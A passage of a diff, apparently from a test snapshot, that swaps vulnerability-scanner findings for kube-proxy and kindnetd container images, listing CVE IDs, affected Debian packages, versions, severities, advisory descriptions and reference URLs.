"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1050", + "value": "https://linux.oracle.com/cve/CVE-2021-35942.html", }, { "type": "URL", - "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0361.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-1569.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", + "value": "https://security.netapp.com/advisory/ntap-20210827-0005/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", + "value": "https://sourceware.org/glibc/wiki/Security%20Exceptions", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230324-0005/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5901-1", + "value": "https://ubuntu.com/security/notices/USN-5699-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0361", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-35942", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.7.1-5+deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-4209", - "installedVersion": "3.7.1-5", - "packageName": "libgnutls30", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-23218", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-4209", - "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", - "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", - "https://gitlab.com/gnutls/gnutls/-/issues/1306", - "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", - "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", - "https://security.netapp.com/advisory/ntap-20220915-0005/", - "https://ubuntu.com/security/notices/USN-5550-1", - "https://ubuntu.com/security/notices/USN-5750-1", - "https://www.cve.org/CVERecord?id=CVE-2021-4209", + "https://access.redhat.com/security/cve/CVE-2022-23218", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", + "https://linux.oracle.com/cve/CVE-2022-23218.html", + "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", + "https://security.gentoo.org/glsa/202208-24", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2022-23218", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "GnuTLS: Null pointer dereference in MD_UPDATE", + "name": "glibc: Stack-based buffer overflow in svcunix_create via long pathnames", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-4209", + "value": "https://avd.aquasec.com/nvd/cve-2022-23218", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-4209", + "value": "https://access.redhat.com/security/cve/CVE-2022-23218", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", + "value": "https://linux.oracle.com/cve/CVE-2022-23218.html", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", + "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1306", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220915-0005/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5550-1", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5750-1", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-4209", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-23218", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3389", - "installedVersion": "3.7.1-5", - "packageName": "libgnutls30", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-23219", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", - "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", - "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", - "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", - "http://curl.haxx.se/docs/adv_20120124B.html", - "http://downloads.asterisk.org/pub/security/AST-2016-001.html", - "http://ekoparty.org/2011/juliano-rizzo.php", - "http://eprint.iacr.org/2004/111", - "http://eprint.iacr.org/2006/136", - "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", - "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", - "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", - "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", - "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", - "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", - "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", - "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", - "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", - "http://marc.info/?l=bugtraq&m=132750579901589&w=2", - "http://marc.info/?l=bugtraq&m=132872385320240&w=2", - "http://marc.info/?l=bugtraq&m=133365109612558&w=2", - "http://marc.info/?l=bugtraq&m=133728004526190&w=2", - "http://marc.info/?l=bugtraq&m=134254866602253&w=2", - "http://marc.info/?l=bugtraq&m=134254957702612&w=2", - "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", - "http://osvdb.org/74829", - "http://rhn.redhat.com/errata/RHSA-2012-0508.html", - "http://rhn.redhat.com/errata/RHSA-2013-1455.html", - "http://secunia.com/advisories/45791", - "http://secunia.com/advisories/47998", - "http://secunia.com/advisories/48256", - "http://secunia.com/advisories/48692", - "http://secunia.com/advisories/48915", - "http://secunia.com/advisories/48948", - "http://secunia.com/advisories/49198", - "http://secunia.com/advisories/55322", - "http://secunia.com/advisories/55350", - "http://secunia.com/advisories/55351", - "http://security.gentoo.org/glsa/glsa-201203-02.xml", - "http://security.gentoo.org/glsa/glsa-201406-32.xml", - "http://support.apple.com/kb/HT4999", - "http://support.apple.com/kb/HT5001", - "http://support.apple.com/kb/HT5130", - "http://support.apple.com/kb/HT5281", - "http://support.apple.com/kb/HT5501", - "http://support.apple.com/kb/HT6150", - "http://technet.microsoft.com/security/advisory/2588513", - "http://vnhacker.blogspot.com/2011/09/beast.html", - "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", - "http://www.debian.org/security/2012/dsa-2398", - "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", - "http://www.ibm.com/developerworks/java/jdk/alerts/", - "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", - "http://www.insecure.cl/Beast-SSL.rar", - "http://www.kb.cert.org/vuls/id/864643", - "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", - "http://www.opera.com/docs/changelogs/mac/1151/", - "http://www.opera.com/docs/changelogs/mac/1160/", - "http://www.opera.com/docs/changelogs/unix/1151/", - "http://www.opera.com/docs/changelogs/unix/1160/", - "http://www.opera.com/docs/changelogs/windows/1151/", - "http://www.opera.com/docs/changelogs/windows/1160/", - "http://www.opera.com/support/kb/view/1004/", - "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", - "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", - "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", - "http://www.redhat.com/support/errata/RHSA-2011-1384.html", - "http://www.redhat.com/support/errata/RHSA-2012-0006.html", - "http://www.securityfocus.com/bid/49388", - "http://www.securityfocus.com/bid/49778", - "http://www.securitytracker.com/id/1029190", - "http://www.securitytracker.com/id?1025997", - "http://www.securitytracker.com/id?1026103", - "http://www.securitytracker.com/id?1026704", - "http://www.ubuntu.com/usn/USN-1263-1", - "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", - "https://access.redhat.com/security/cve/CVE-2011-3389", - "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", - "https://bugzilla.novell.com/show_bug.cgi?id=719047", - "https://bugzilla.redhat.com/show_bug.cgi?id=737506", - "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", - "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", - "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", - "https://hermes.opensuse.org/messages/13154861", - "https://hermes.opensuse.org/messages/13155432", - "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", - "https://linux.oracle.com/cve/CVE-2011-3389.html", - "https://linux.oracle.com/errata/ELSA-2011-1380.html", - "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", - "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", - "https://ubuntu.com/security/notices/USN-1263-1", - "https://www.cve.org/CVERecord?id=CVE-2011-3389", + "https://access.redhat.com/security/cve/CVE-2022-23219", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", + "https://linux.oracle.com/cve/CVE-2022-23219.html", + "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", + "https://security.gentoo.org/glsa/202208-24", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2022-23219", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST)", + "name": "glibc: Stack-based buffer overflow in sunrpc clnt_create via a long pathname", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3389", - }, - { - "type": "URL", - "value": "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", - }, - { - "type": "URL", - "value": "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", - }, - { - "type": "URL", - "value": "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", - }, - { - "type": "URL", - "value": "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", - }, - { - "type": "URL", - "value": "http://curl.haxx.se/docs/adv_20120124B.html", - }, - { - "type": "URL", - "value": "http://downloads.asterisk.org/pub/security/AST-2016-001.html", - }, - { - "type": "URL", - "value": "http://ekoparty.org/2011/juliano-rizzo.php", - }, - { - "type": "URL", - "value": "http://eprint.iacr.org/2004/111", - }, - { - "type": "URL", - "value": "http://eprint.iacr.org/2006/136", - }, - { - "type": "URL", - "value": "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", - }, - { - "type": "URL", - "value": "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", - }, - { - "type": "URL", - "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", - }, - { - "type": "URL", - "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", - }, - { - "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", - }, - { - "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", - }, - { - "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", - }, - { - "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", - }, - { - "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=132750579901589&w=2", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=132872385320240&w=2", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=133365109612558&w=2", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=133728004526190&w=2", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=134254866602253&w=2", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=134254957702612&w=2", - }, - { - "type": "URL", - "value": "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", - }, - { - "type": "URL", - "value": "http://osvdb.org/74829", + "value": "https://avd.aquasec.com/nvd/cve-2022-23219", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2012-0508.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-23219", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2013-1455.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", }, { "type": "URL", - "value": "http://secunia.com/advisories/45791", + "value": "https://linux.oracle.com/cve/CVE-2022-23219.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/47998", + "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/48256", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/48692", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", }, { "type": "URL", - "value": "http://secunia.com/advisories/48915", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "http://secunia.com/advisories/48948", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", }, { "type": "URL", - "value": "http://secunia.com/advisories/49198", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "http://secunia.com/advisories/55322", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "http://secunia.com/advisories/55350", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-23219", }, { "type": "URL", - "value": "http://secunia.com/advisories/55351", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-1751", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-1751", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", + "https://linux.oracle.com/cve/CVE-2020-1751.html", + "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", + "https://security.gentoo.org/glsa/202006-04", + "https://security.netapp.com/advisory/ntap-20200430-0002/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-1751", + ], + }, + "category": "Vulnerability", + "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: array overflow in backtrace functions for powerpc", + "references": [ { "type": "URL", - "value": "http://security.gentoo.org/glsa/glsa-201203-02.xml", + "value": "https://avd.aquasec.com/nvd/cve-2020-1751", }, { "type": "URL", - "value": "http://security.gentoo.org/glsa/glsa-201406-32.xml", + "value": "https://access.redhat.com/security/cve/CVE-2020-1751", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT4999", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5001", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5130", + "value": "https://linux.oracle.com/cve/CVE-2020-1751.html", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5281", + "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5501", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT6150", + "value": "https://security.gentoo.org/glsa/202006-04", }, { "type": "URL", - "value": "http://technet.microsoft.com/security/advisory/2588513", + "value": "https://security.netapp.com/advisory/ntap-20200430-0002/", }, { "type": "URL", - "value": "http://vnhacker.blogspot.com/2011/09/beast.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", }, { "type": "URL", - "value": "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "http://www.debian.org/security/2012/dsa-2398", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1751", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-1752", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-1752", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", + "https://linux.oracle.com/cve/CVE-2020-1752.html", + "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", + "https://security.gentoo.org/glsa/202101-20", + "https://security.netapp.com/advisory/ntap-20200511-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-1752", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: use-after-free in glob() function when expanding ~user", + "references": [ { "type": "URL", - "value": "http://www.ibm.com/developerworks/java/jdk/alerts/", + "value": "https://avd.aquasec.com/nvd/cve-2020-1752", }, { "type": "URL", - "value": "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", + "value": "https://access.redhat.com/security/cve/CVE-2020-1752", }, { "type": "URL", - "value": "http://www.insecure.cl/Beast-SSL.rar", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", }, { "type": "URL", - "value": "http://www.kb.cert.org/vuls/id/864643", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", }, { "type": "URL", - "value": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", + "value": "https://linux.oracle.com/cve/CVE-2020-1752.html", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/mac/1151/", + "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/mac/1160/", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/unix/1151/", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/unix/1160/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/windows/1151/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/windows/1160/", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "http://www.opera.com/support/kb/view/1004/", + "value": "https://security.netapp.com/advisory/ntap-20200511-0005/", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "http://www.redhat.com/support/errata/RHSA-2011-1384.html", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "http://www.redhat.com/support/errata/RHSA-2012-0006.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1752", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-6096", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-6096", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", + "https://security.gentoo.org/glsa/202101-20", + "https://sourceware.org/bugzilla/attachment.cgi?id=12334", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "https://ubuntu.com/security/notices/USN-4954-1", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://www.cve.org/CVERecord?id=CVE-2020-6096", + "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + ], + }, + "category": "Vulnerability", + "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: signed comparison vulnerability in the ARMv7 memcpy function", + "references": [ { "type": "URL", - "value": "http://www.securityfocus.com/bid/49388", + "value": "https://avd.aquasec.com/nvd/cve-2020-6096", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/49778", + "value": "https://access.redhat.com/security/cve/CVE-2020-6096", }, { "type": "URL", - "value": "http://www.securitytracker.com/id/1029190", + "value": 